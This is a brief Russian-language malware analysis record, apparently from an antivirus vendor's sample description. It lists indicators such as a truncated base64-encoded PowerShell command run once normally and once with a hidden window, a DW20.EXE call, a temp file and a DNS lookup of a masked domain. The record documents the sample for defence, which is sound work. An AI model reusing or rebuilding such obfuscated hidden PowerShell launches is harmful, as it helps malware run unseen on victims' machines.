Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABuADAANABfAF8AMwA1AD0AJwBQADkANQAzADkAMAAnADsAJAB2ADkANgA2ADUAMQAzADgAIAA9ACAAJwA4ADAAOAAnADsAJAB0ADgANwA1ADUAXwA0ADIAPQAnAEcAOAA2ADMANgBfACcAOwAkAHoAMAA5ADkAMAA3ADMAPQAkAGUAbgB2ADoAdQB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1396
- %TEMP%\1040433.cvr
- DNS ASK x1####finalj.info
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABuADAANABfAF8AMwA1AD0AJwBQADkANQAzADkAMAAnADsAJAB2ADkANgA2ADUAMQAzADgAIAA9ACAAJwA4ADAAOAAnADsAJAB0ADgANwA1ADUAXwA0ADIAPQAnAEcAOAA2ADMANgBfACcAOwAkAHoAMAA5ADkAMAA3ADMAPQAkAGUAbgB2ADoAdQB... (со скрытым окном)